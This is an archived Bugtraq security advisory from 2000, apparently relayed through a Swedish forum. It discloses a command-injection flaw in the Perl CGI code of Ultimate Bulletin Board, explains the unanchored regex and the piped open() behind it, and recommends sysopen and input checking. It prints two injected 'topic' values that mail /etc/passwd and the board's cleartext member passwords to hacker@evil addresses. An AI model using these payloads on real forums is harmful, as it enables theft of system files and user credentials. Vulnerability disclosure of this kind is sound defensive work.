linux, säkerhet

4797326 2000-02-14  20:27  /58 rader/ Postmaster
Mottagare: Bugtraq (import) <9760>
Ärende: perl-cgi hole in UltimateBB by Infopop Corp.
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000211224935.A13236@infomag.ape.relarn.ru>
Date:         Fri, 11 Feb 2000 22:49:35 +0300
Reply-To: "Sergei A. Golubchik" <serg@INFOMAG.APE.RELARN.RU>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Sergei A. Golubchik" <serg@INFOMAG.APE.RELARN.RU>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

Hello.

Writing cgi scripts in perl is simple. It's also rather safe,
providing authors follow very simple instructions. But they don't.

Browsing some site, I found that their forums were based not on home-
made scripts, but rather commercial software product. Hey, said I to
myself, remember those story about pcweek hack ? They use commercial
package photoads. Let's look what that Ultimate Bulletin Board by
Infopop is.

I grabbed freeware version from http://www.ultimatebb.com and
after 10-minutes grepping found those lines:

ubb_library.pl:901-902
          if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
          open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");

(notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about
while writing it ? Girls ?)

And the $ThreadFile takes its value directly from the hidden (hmm!)
field `topic'.

So when I filled the form with
topic='012345.ubb|mail hacker@evil.com </etc/passwd|'
It happily gives me /etc/passwd. And
topic='012345.ubb|cat Members/*|mail hacker@evil.org|'
shows all users of bulletin board, and their passwords too (in cleartext!).

So one should only open "reply" form in the forum, save it to disk,
and set topic field to whatever he want. And this stupid UBB (at least
freeware version) doesn't keep the logs (unless, so-called, hacklog,
used when the condition above is not met).

The fix is obvious. But the rule of the thumb is "do not use magic
perl open".  At least in cgi scripts. If you want to open regular
file, sysopen does the trick as well.

And again: CHECK EVERYTHING!

Regards,
SerG.

P.S. Vendor was notified.
(4797326) ------------------------------------------(Ombruten)